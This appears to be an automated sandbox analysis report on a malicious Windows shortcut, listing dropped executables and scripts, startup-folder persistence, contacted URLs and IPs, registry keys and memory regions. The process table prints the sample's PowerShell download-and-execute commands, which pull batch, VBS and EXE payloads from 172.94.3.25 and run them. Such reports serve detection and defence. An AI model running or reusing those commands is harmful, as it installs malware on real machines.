Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
Dlr7HYI6VL.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has command line arguments,
Icon number=1, Archive, ctime=Mon Aug 26 12:29:30 2024, mtime=Mon Aug 26 12:29:30 2024, atime=Mon Aug 26 12:29:30 2024, length=278528,
window=hidenormalshowminimized
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Temp\demhwk
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Temp\gps
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Temp\qapuwvr
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\AUGUST.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\ffo.bat
|
DOS batch file, ASCII text, with CRLF line terminators
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\hello.bat
|
DOS batch file, ASCII text, with CRLF line terminators
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\hi.vbs
|
ASCII text, with CRLF line terminators
|
dropped
|
|
|
|
C:\Users\user\DZIPR.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\DZIPR.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\ProgramData\Microsoft\Network\Downloader\edb.log
|
data
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
|
Extensible storage user DataBase, version 0x620, checksum 0xa0cf7431, page size 16384, DirtyShutdown, Windows version 10.0
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\6e17276
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5w0ugwjb.zhf.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_chua5xud.xaa.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_exkyhqr3.khy.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_issxs0m2.1x4.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_itcxxoq4.eoy.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jdnnkvff.gsl.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jhkk0vgu.afh.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tlvabzwv.nho.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\f155ca23
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\fc577906
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\uvnhjq
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 25 15:40:34
2024, mtime=Wed Sep 25 15:40:34 2024, atime=Wed Sep 25 10:50:28 2024, length=8767704, window=hide
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BIT2369.tmp
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 25 15:40:34
2024, mtime=Wed Sep 25 15:40:34 2024, atime=Wed Sep 25 10:50:28 2024, length=8767704, window=hide
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\oracledemo_dbg.lnk (copy)
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 25 15:40:34
2024, mtime=Wed Sep 25 15:40:34 2024, atime=Wed Sep 25 10:50:28 2024, length=8767704, window=hide
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Ruy_driverv2\ekqqtq
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Ruy_driverv2\ipqtwm
|
data
|
dropped
|
||
|
C:\Users\user\ekqqtq
|
data
|
dropped
|
||
|
C:\Users\user\ipqtwm
|
data
|
dropped
|
||
|
C:\Windows\Tasks\lnfast_x64.job
|
data
|
dropped
|
There are 25 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c powershell wget http://172.94.3.25/hello.bat -OutFile C:\Users\user\AppData\Roaming/hello.bat
&& C:\Users\user\AppData\Roaming/hello.bat
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell wget http://172.94.3.25/hello.bat -OutFile C:\Users\user\AppData\Roaming/hello.bat
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell wget http://172.94.3.25/ffo.bat -OutFile C:\Users\user\AppData\Roaming/ffo.bat
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell wget http://172.94.3.25/hi.vbs -OutFile C:\Users\user\AppData\Roaming/hi.vbs
|
|
|
|
C:\Windows\System32\cmd.exe
|
cmd /c C:\Users\user\AppData\Roaming/hi.vbs
|
|
|
|
C:\Windows\System32\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\hi.vbs"
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\ffo.bat" "
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell wget http://172.94.3.25/AUGUST.exe -OutFile C:\Users\user\AppData\Roaming/AUGUST.exe
|
|
|
|
C:\Users\user\AppData\Roaming\AUGUST.exe
|
C:\Users\user\AppData\Roaming/AUGUST.exe
|
|
|
|
C:\Users\user\DZIPR.exe
|
"C:\Users\user\DZIPR.exe"
|
|
|
|
C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
|
C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
C:\Windows\SysWOW64\cmd.exe
|
|
|
|
C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
|
C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
C:\Windows\SysWOW64\cmd.exe
|
|
|
|
C:\Windows\SysWOW64\explorer.exe
|
C:\Windows\SysWOW64\explorer.exe
|
|
|
|
C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
|
"C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe"
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
C:\Windows\SysWOW64\cmd.exe
|
|
|
|
C:\Windows\SysWOW64\explorer.exe
|
C:\Windows\SysWOW64\explorer.exe
|
|
|
|
C:\Windows\SysWOW64\explorer.exe
|
C:\Windows\SysWOW64\explorer.exe
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 16 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://172.94.3.25/hi.vbs
|
172.94.3.25
|
|
|
|
http://172.94.3.25/AUGUST.exe
|
172.94.3.25
|
|
|
|
http://172.94.3.25/ffo.bat
|
172.94.3.25
|
|
|
|
fullimmersion777.com
|
|
||
|
http://172.94.3.25/hello.bat
|
172.94.3.25
|
|
|
|
https://g.live.com/odclientsettings/Prod1C:
|
unknown
|
||
|
https://www.digicert.c
|
unknown
|
||
|
http://www.vmware.com/0
|
unknown
|
||
|
https://www.datanumen.com/zip-repair/
|
unknown
|
||
|
http://www.symauth.com/rpa00
|
unknown
|
||
|
https://www.datanumen.com/zip-repair-order/2https://www.datanumen.com/socialmedia/facebook.htm
|
unknown
|
||
|
http://www.info-zip.org/
|
unknown
|
||
|
http://www.vmware.com/0/
|
unknown
|
||
|
https://g.live.com/odclientsettings/ProdV21C:
|
unknown
|
||
|
https://www.datanumen.com/contact/0https://www.datanumen.com/update/dzipr/dzipr.inf
|
unknown
|
||
|
http://c0rl.m%L
|
unknown
|
||
|
http://www.repairfile.com
|
unknown
|
||
|
http://www.symauth.com/cps0(
|
unknown
|
||
|
http://support.datanumen.com
|
unknown
|
||
|
https://www.datanumen.com/%https://www.datanumen.com/zip-repair/
|
unknown
|
||
|
https://www.datanumen.com/support/
|
unknown
|
There are 11 hidden URLs, click here to show them.
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
172.94.3.25
|
unknown
|
United States
|
|
|
|
127.0.0.1
|
unknown
|
unknown
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
LangID
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\System32\WScript.exe.FriendlyAppName
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\System32\WScript.exe.ApplicationCompany
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
|
PerfMMFileName
|
There are 8 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
5816000
|
trusted library allocation
|
page read and write
|
|
|
|
459000
|
unkown
|
page readonly
|
|
|
|
5010000
|
direct allocation
|
page read and write
|
|
|
|
459000
|
unkown
|
page readonly
|
|
|
|
49CB000
|
trusted library allocation
|
page read and write
|
|
|
|
4EFE000
|
trusted library allocation
|
page read and write
|
|
|
|
4DA6000
|
trusted library allocation
|
page read and write
|
|
|
|
4E34000
|
trusted library allocation
|
page read and write
|
|
|
|
35DF000
|
heap
|
page read and write
|
|
|
|
5DB0000
|
direct allocation
|
page read and write
|
|
|
|
4EE1000
|
trusted library allocation
|
page read and write
|
|
|
|
459000
|
unkown
|
page readonly
|
|
|
|
5950000
|
direct allocation
|
page read and write
|
|
|
|
CF6000
|
heap
|
page read and write
|
||
|
2061F260000
|
heap
|
page read and write
|
||
|
1F7D7A10000
|
heap
|
page read and write
|
||
|
518E000
|
direct allocation
|
page read and write
|
||
|
E26000
|
heap
|
page read and write
|
||
|
2A44000
|
unkown
|
page read and write
|
||
|
A5F3FE000
|
stack
|
page read and write
|
||
|
B498FFE000
|
stack
|
page read and write
|
||
|
E26000
|
heap
|
page read and write
|
||
|
B499A7E000
|
stack
|
page read and write
|
||
|
2BB6000
|
unkown
|
page read and write
|
||
|
23E0000
|
heap
|
page read and write
|
||
|
41A000
|
unkown
|
page readonly
|
||
|
40FB000
|
unkown
|
page read and write
|
||
|
D81000
|
heap
|
page read and write
|
||
|
4FD0000
|
direct allocation
|
page read and write
|
||
|
2BAE000
|
unkown
|
page read and write
|
||
|
32EA000
|
heap
|
page read and write
|
||
|
EDE000
|
stack
|
page read and write
|
||
|
2A10000
|
heap
|
page read and write
|
||
|
3300000
|
unkown
|
page read and write
|
||
|
2BB6000
|
unkown
|
page read and write
|
||
|
2BB6000
|
unkown
|
page read and write
|
||
|
8C8000
|
unkown
|
page write copy
|
||
|
3B30000
|
trusted library allocation
|
page read and write
|
||
|
5CB1000
|
unkown
|
page read and write
|
||
|
299F000
|
heap
|
page read and write
|
||
|
2334000
|
unkown
|
page read and write
|
||
|
4FB9000
|
direct allocation
|
page read and write
|
||
|
7DD000
|
stack
|
page read and write
|
||
|
8C8000
|
unkown
|
page read and write
|
||
|
B498577000
|
stack
|
page read and write
|
||
|
2BB6000
|
unkown
|
page read and write
|
||
|
295F000
|
stack
|
page read and write
|
||
|
3340000
|
heap
|
page read and write
|
||
|
2D8E000
|
unkown
|
page read and write
|
||
|
E00000
|
heap
|
page read and write
|
||
|
2334000
|
unkown
|
page read and write
|
||
|
2A30000
|
unkown
|
page read and write
|
||
|
450000
|
heap
|
page read and write
|
||
|
2BB6000
|
unkown
|
page read and write
|
||
|
2BB6000
|
unkown
|
page read and write
|
||
|
DD4000
|
heap
|
page read and write
|
||
|
DCE000
|
stack
|
page read and write
|
||
|
2340000
|
unkown
|
page readonly
|
||
|
2BB6000
|
unkown
|
page read and write
|
||
|
34B4000
|
unkown
|
page read and write
|
||
|
2BB6000
|
unkown
|
page read and write
|
||
|
2061F289000
|
heap
|
page read and write
|
||
|
B4995FE000
|
stack
|
page read and write
|
||
|
38F7000
|
heap
|
page read and write
|
||
|
387B000
|
heap
|
page read and write
|
||
|
2A20000
|
unkown
|
page read and write
|
||
|
C70000
|
heap
|
page read and write
|
||
|
2061F150000
|
trusted library allocation
|
page read and write
|
||
|
38A4000
|
unkown
|
page read and write
|
||
|
278D000
|
heap
|
page read and write
|
||
|
2AD0000
|
heap
|
page read and write
|
||
|
E54000
|
heap
|
page read and write
|
||
|
20619C13000
|
heap
|
page read and write
|
||
|
34B4000
|
unkown
|
page read and write
|
||
|
2334000
|
unkown
|
page read and write
|
||
|
417000
|
unkown
|
page write copy
|
||
|
34B4000
|
unkown
|
page read and write
|
||
|
A5FAFE000
|
stack
|
page read and write
|
||
|
101E000
|
stack
|
page read and write
|
||
|
2061F020000
|
trusted library allocation
|
page read and write
|
||
|
2E6C000
|
unkown
|
page read and write
|
||
|
2ADE000
|
stack
|
page read and write
|
||
|
2AE5000
|
heap
|
page read and write
|
||
|
2061AA40000
|
trusted library section
|
page readonly
|
||
|
20619C8D000
|
heap
|
page read and write
|
||
|
3588000
|
heap
|
page read and write
|
||
|
285E000
|
stack
|
page read and write
|
||
|
20619C7C000
|
heap
|
page read and write
|
||
|
3390000
|
heap
|
page read and write
|
||
|
2061AB80000
|
trusted library allocation
|
page read and write
|
||
|
2334000
|
unkown
|
page read and write
|
||
|
4E81000
|
unkown
|
page read and write
|
||
|
8A2000
|
unkown
|
page write copy
|
||
|
E4E000
|
stack
|
page read and write
|
||
|
53A1000
|
unkown
|
page read and write
|
||
|
4BAA000
|
heap
|
page read and write
|
||
|
32E7000
|
heap
|
page read and write
|
||
|
29A1000
|
heap
|
page read and write
|
||
|
CF6000
|
heap
|
page read and write
|
||
|
2350000
|
unkown
|
page readonly
|
||
|
2061F030000
|
trusted library allocation
|
page read and write
|
||
|
567E000
|
stack
|
page read and write
|
||
|
2E5C000
|
stack
|
page read and write
|
||
|
1F7D7AC8000
|
heap
|
page read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
5000000
|
unkown
|
page read and write
|
||
|
1F7D79B0000
|
heap
|
page read and write
|
||
|
33A2000
|
heap
|
page read and write
|
||
|
5A9E000
|
direct allocation
|
page read and write
|
||
|
CF0000
|
heap
|
page read and write
|
||
|
9B000
|
stack
|
page read and write
|
||
|
32B1000
|
heap
|
page read and write
|
||
|
53A1000
|
unkown
|
page read and write
|
||
|
19A000
|
stack
|
page read and write
|
||
|
4C79000
|
heap
|
page read and write
|
||
|
2BB6000
|
unkown
|
page read and write
|
||
|
2BB7000
|
unkown
|
page read and write
|
||
|
41C000
|
unkown
|
page execute read
|
||
|
34B7000
|
heap
|
page read and write
|
||
|
2C90000
|
heap
|
page read and write
|
||
|
347E000
|
unkown
|
page read and write
|
||
|
2F94000
|
unkown
|
page read and write
|
||
|
A5FBFB000
|
stack
|
page read and write
|
||
|
2061F264000
|
heap
|
page read and write
|
||
|
2334000
|
unkown
|
page read and write
|
||
|
2DF0000
|
heap
|
page read and write
|
||
|
2BB6000
|
unkown
|
page read and write
|
||
|
2061F007000
|
trusted library allocation
|
page read and write
|
||
|
5780000
|
unkown
|
page read and write
|
||
|
53B0000
|
unkown
|
page read and write
|
||
|
2581000
|
heap
|
page read and write
|
||
|
34B4000
|
unkown
|
page read and write
|
||
|
CCC000
|
heap
|
page read and write
|
||
|
268A000
|
heap
|
page read and write
|
||
|
2061A500000
|
heap
|
page read and write
|
||
|
3480000
|
direct allocation
|
page read and write
|
||
|
4002000
|
unkown
|
page read and write
|
||
|
1F7D7A46000
|
heap
|
page read and write
|
||
|
19B000
|
stack
|
page read and write
|
||
|
27FA000
|
stack
|
page read and write
|
||
|
2F80000
|
unkown
|
page readonly
|
||
|
2061AA80000
|
trusted library section
|
page readonly
|
||
|
2061EFB0000
|
trusted library allocation
|
page read and write
|
||
|
E20000
|
heap
|
page read and write
|
||
|
2334000
|
unkown
|
page read and write
|
||
|
29A0000
|
heap
|
page read and write
|
||
|
6FA75000
|
unkown
|
page read and write
|
||
|
2FDE000
|
heap
|
page read and write
|
||
|
E54000
|
heap
|
page read and write
|
||
|
4DE000
|
stack
|
page read and write
|
||
|
3360000
|
heap
|
page read and write
|
||
|
37D4000
|
heap
|
page read and write
|
||
|
9C000
|
stack
|
page read and write
|
||
|
4DEB000
|
trusted library allocation
|
page read and write
|
||
|
2AD3000
|
heap
|
page read and write
|
||
|
32B1000
|
heap
|
page read and write
|
||
|
FBB000
|
heap
|
page read and write
|
||
|
E26000
|
heap
|
page read and write
|
||
|
27FF000
|
heap
|
page read and write
|
||
|
2061F140000
|
trusted library allocation
|
page read and write
|
||
|
1F7D7A38000
|
heap
|
page read and write
|
||
|
3FF0000
|
unkown
|
page read and write
|
||
|
D4A000
|
heap
|
page read and write
|
||
|
33BB000
|
heap
|
page read and write
|
||
|
1F7D7A3A000
|
heap
|
page read and write
|
||
|
2BB6000
|
unkown
|
page read and write
|
||
|
478000
|
unkown
|
page readonly
|
||
|
34B4000
|
unkown
|
page read and write
|
||
|
A5F8FE000
|
stack
|
page read and write
|
||
|
CCE000
|
stack
|
page read and write
|
||
|
C80000
|
heap
|
page read and write
|
||
|
2BB6000
|
unkown
|
page read and write
|
||
|
2580000
|
heap
|
page read and write
|
||
|
28A0000
|
heap
|
page read and write
|
||
|
50BE000
|
direct allocation
|
page read and write
|
||
|
34B4000
|
unkown
|
page read and write
|
||
|
4C5E000
|
direct allocation
|
page read and write
|
||
|
34B4000
|
unkown
|
page read and write
|
||
|
2581000
|
heap
|
page read and write
|
||
|
DEE000
|
stack
|
page read and write
|
||
|
D0E000
|
heap
|
page read and write
|
||
|
2A70000
|
heap
|
page read and write
|
||
|
2334000
|
unkown
|
page read and write
|
||
|
1F7D7A61000
|
heap
|
page read and write
|
||
|
1F7D7AB4000
|
heap
|
page read and write
|
||
|
2334000
|
unkown
|
page read and write
|
||
|
2E60000
|
direct allocation
|
page read and write
|
||
|
511D000
|
direct allocation
|
page read and write
|
||
|
23F0000
|
heap
|
page read and write
|
||
|
6C511000
|
unkown
|
page execute read
|
||
|
34EB000
|
heap
|
page read and write
|
||
|
E26000
|
heap
|
page read and write
|
||
|
8C9000
|
unkown
|
page read and write
|
||
|
2334000
|
unkown
|
page read and write
|
||
|
31EC000
|
heap
|
page read and write
|
||
|
5F40000
|
heap
|
page read and write
|
||
|
2BB0000
|
heap
|
page read and write
|
||
|
37CF000
|
stack
|
page read and write
|
||
|
2061A415000
|
heap
|
page read and write
|
||
|
2334000
|
unkown
|
page read and write
|
||
|
5E5000
|
heap
|
page read and write
|
||
|
B49927E000
|
unkown
|
page readonly
|
||
|
2334000
|
unkown
|
page read and write
|
||
|
2BB6000
|
unkown
|
page read and write
|
||
|
1F7D7A5F000
|
heap
|
page read and write
|
||
|
2061A402000
|
heap
|
page read and write
|
||
|
29B8000
|
heap
|
page read and write
|
||
|
B499BFE000
|
unkown
|
page readonly
|
||
|
6FAF1000
|
unkown
|
page read and write
|
||
|
4AC0000
|
direct allocation
|
page read and write
|
||
|
29A1000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
40C0000
|
unkown
|
page read and write
|
||
|
338D000
|
heap
|
page read and write
|
||
|
4B11000
|
heap
|
page read and write
|
||
|
502E000
|
direct allocation
|
page read and write
|
||
|
2334000
|
unkown
|
page read and write
|
||
|
38A4000
|
unkown
|
page read and write
|
||
|
3308000
|
heap
|
page read and write
|
||
|
4FF0000
|
direct allocation
|
page read and write
|
||
|
2061A51A000
|
heap
|
page read and write
|
||
|
2BB6000
|
unkown
|
page read and write
|
||
|
E54000
|
heap
|
page read and write
|
||
|
370B000
|
heap
|
page read and write
|
||
|
402A000
|
unkown
|
page read and write
|
||
|
41B6000
|
unkown
|
page read and write
|
||
|
A5EF4A000
|
stack
|
page read and write
|
||
|
2334000
|
unkown
|
page read and write
|
||
|
20619C00000
|
heap
|
page read and write
|
||
|
297B000
|
heap
|
page read and write
|
||
|
2334000
|
unkown
|
page read and write
|
||
|
6C510000
|
unkown
|
page readonly
|
||
|
B49997E000
|
unkown
|
page readonly
|
||
|
2DDE000
|
unkown
|
page read and write
|
||
|
2E60000
|
unkown
|
page read and write
|
||
|
E50000
|
heap
|
page read and write
|
||
|
C70000
|
heap
|
page read and write
|
||
|
A5F2FE000
|
stack
|
page read and write
|
||
|
2334000
|
unkown
|
page read and write
|
||
|
2570000
|
heap
|
page read and write
|
||
|
30D8000
|
heap
|
page read and write
|
||
|
E54000
|
heap
|
page read and write
|
||
|
432000
|
unkown
|
page readonly
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
2B9F000
|
stack
|
page read and write
|
||
|
32AF000
|
stack
|
page read and write
|
||
|
2BB6000
|
unkown
|
page read and write
|
||
|
2334000
|
unkown
|
page read and write
|
||
|
403B000
|
unkown
|
page read and write
|
||
|
1F7D7A86000
|
heap
|
page read and write
|
||
|
33D2000
|
heap
|
page read and write
|
||
|
F40000
|
heap
|
page read and write
|
||
|
2CF0000
|
heap
|
page read and write
|
||
|
558A000
|
heap
|
page read and write
|
||
|
40C2000
|
unkown
|
page read and write
|
||
|
CF6000
|
heap
|
page read and write
|
||
|
CF6000
|
heap
|
page read and write
|
||
|
231A000
|
stack
|
page read and write
|
||
|
4EE000
|
heap
|
page read and write
|
||
|
2BB6000
|
unkown
|
page read and write
|
||
|
482000
|
unkown
|
page write copy
|
||
|
D3B000
|
heap
|
page read and write
|
||
|
113F000
|
stack
|
page read and write
|
||
|
26DC000
|
heap
|
page read and write
|
||
|
2A9E000
|
stack
|
page read and write
|
||
|
2334000
|
unkown
|
page read and write
|
||
|
2B66000
|
heap
|
page read and write
|
||
|
50D0000
|
heap
|
page read and write
|
||
|
FA2000
|
heap
|
page read and write
|
||
|
2970000
|
heap
|
page read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
F2F000
|
stack
|
page read and write
|
||
|
3810000
|
unkown
|
page read and write
|
||
|
8D0000
|
heap
|
page read and write
|
||
|
26FC000
|
stack
|
page read and write
|
||
|
368F000
|
unkown
|
page read and write
|
||
|
2BB6000
|
unkown
|
page read and write
|
||
|
2334000
|
unkown
|
page read and write
|
||
|
31D0000
|
heap
|
page read and write
|
||
|
76D000
|
stack
|
page read and write
|
||
|
FDF000
|
stack
|
page read and write
|
||
|
1F7D7A5C000
|
heap
|
page read and write
|
||
|
417000
|
unkown
|
page read and write
|
||
|
6FAE8000
|
unkown
|
page readonly
|
||
|
C70000
|
heap
|
page read and write
|
||
|
2BB6000
|
unkown
|
page read and write
|
||
|
38A0000
|
unkown
|
page read and write
|
||
|
B499D7D000
|
stack
|
page read and write
|
||
|
49E000
|
stack
|
page read and write
|
||
|
1F7D7A39000
|
heap
|
page read and write
|
||
|
29A2000
|
heap
|
page read and write
|
||
|
3C5D000
|
trusted library allocation
|
page read and write
|
||
|
2B94000
|
heap
|
page read and write
|
||
|
413000
|
unkown
|
page readonly
|
||
|
2BDE000
|
stack
|
page read and write
|
||
|
DD4000
|
heap
|
page read and write
|
||
|
2A44000
|
unkown
|
page read and write
|
||
|
6C545000
|
unkown
|
page read and write
|
||
|
2BB8000
|
unkown
|
page read and write
|
||
|
1F7D7A5B000
|
heap
|
page read and write
|
||
|
B4994FE000
|
stack
|
page read and write
|
||
|
B49977B000
|
stack
|
page read and write
|
||
|
B49887E000
|
stack
|
page read and write
|
||
|
2061EFE0000
|
trusted library allocation
|
page read and write
|
||
|
34B4000
|
unkown
|
page read and write
|
||
|
2061A502000
|
heap
|
page read and write
|
||
|
5900000
|
direct allocation
|
page read and write
|
||
|
6FAC1000
|
unkown
|
page execute read
|
||
|
2334000
|
unkown
|
page read and write
|
||
|
1F7D7A37000
|
heap
|
page read and write
|
||
|
2BB6000
|
unkown
|
page read and write
|
||
|
34B4000
|
unkown
|
page read and write
|
||
|
34B4000
|
unkown
|
page read and write
|
||
|
57CD000
|
trusted library allocation
|
page read and write
|
||
|
36FA000
|
heap
|
page read and write
|
||
|
7BE000
|
stack
|
page read and write
|
||
|
2B7E000
|
heap
|
page read and write
|
||
|
8D0000
|
unkown
|
page readonly
|
||
|
2BB6000
|
unkown
|
page read and write
|
||
|
2061F0D0000
|
trusted library allocation
|
page read and write
|
||
|
2334000
|
unkown
|
page read and write
|
||
|
2334000
|
unkown
|
page read and write
|
||
|
A5F6FE000
|
stack
|
page read and write
|
||
|
D13000
|
heap
|
page read and write
|
||
|
1F7D79B5000
|
heap
|
page read and write
|
||
|
2334000
|
unkown
|
page read and write
|
||
|
2334000
|
unkown
|
page read and write
|
||
|
26E4000
|
heap
|
page read and write
|
||
|
40B0000
|
unkown
|
page read and write
|
||
|
33EF000
|
heap
|
page read and write
|
||
|
20619CB2000
|
heap
|
page read and write
|
||
|
35BF000
|
heap
|
page read and write
|
||
|
72C000
|
stack
|
page read and write
|
||
|
2F94000
|
unkown
|
page read and write
|
||
|
20619CFE000
|
heap
|
page read and write
|
||
|
31E0000
|
heap
|
page read and write
|
||
|
478000
|
unkown
|
page readonly
|
||
|
F90000
|
heap
|
page read and write
|
||
|
19C000
|
stack
|
page read and write
|
||
|
253E000
|
stack
|
page read and write
|
||
|
2061F292000
|
heap
|
page read and write
|
||
|
B498F7E000
|
unkown
|
page readonly
|
||
|
D10000
|
heap
|
page read and write
|
||
|
28CF000
|
unkown
|
page read and write
|
||
|
2334000
|
unkown
|
page read and write
|
||
|
F9F000
|
heap
|
page read and write
|
||
|
2334000
|
unkown
|
page read and write
|
||
|
1F7D7A86000
|
heap
|
page read and write
|
||
|
DD4000
|
heap
|
page read and write
|
||
|
2061F1A0000
|
remote allocation
|
page read and write
|
||
|
41A000
|
unkown
|
page readonly
|
||
|
2334000
|
unkown
|
